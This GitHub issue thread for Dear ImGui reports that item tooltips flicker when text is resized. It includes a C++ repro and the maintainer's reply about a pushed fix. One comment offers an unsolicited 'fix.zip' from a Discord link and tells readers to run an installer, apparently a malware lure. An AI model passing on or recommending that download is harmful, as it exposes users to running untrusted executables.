### ISSUE TITLE
Item-tooltip for text will disappear for a short time the text get resized

### ISSUE THREAD

**Issue by achabense** [ocornut/imgui#7945]
### Version/Branch of Dear ImGui:

Version 1.90.9

### Back-ends:

imgui_impl_sdl2.cpp + imgui_impl_sdlrenderer2.cpp

### Compiler, OS:

Windows 10 + MSVC 2022

### Details:

When the text get resized, `IsItemHovered(ImGuiHoveredFlags_ForTooltip)` for the text will become 0, even if the mouse remains hovering on the resized one. This can make the tooltip (based on `BeginItemTooltip`) for the text disappear for a very short time, which I think is not ideal behavior.

### Screenshots/Video:

(The tooltip will disappear for a short time when pressing 'Z'.)
![issue](https://github.com/user-attachments/assets/030f18f3-2238-4ff4-8865-b83c861f0e54)

### Minimal, Complete and Verifiable Example code:

```cpp
void issue() {
    if (ImGui::Begin("Issue", 0, ImGuiWindowFlags_NoSavedSettings)) {
        static bool i = 0;
        if (ImGui::IsKeyPressed(ImGuiKey_Z)) {
            i = !i;
        }

        ImGui::Text(i ? "ABCDEFG" : "ABCD");
        if (ImGui::BeginItemTooltip()) {
            ImGui::Text("...");
            ImGui::EndTooltip();
        }
        // Will become 0 when the text is resized:
        ImGui::Text("%d", int(ImGui::IsItemHovered(ImGuiHoveredFlags_ForTooltip)));
    }
    ImGui::End();
}
```

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by ocornut** [comment]
Thank you for the working repro, this is helpful.

I have pushed a fix as f99febf. I think we may end revisiting this by reworking how we create implicit id for e.g. Text() by using counters, this may apply to drag and drop sources as well.
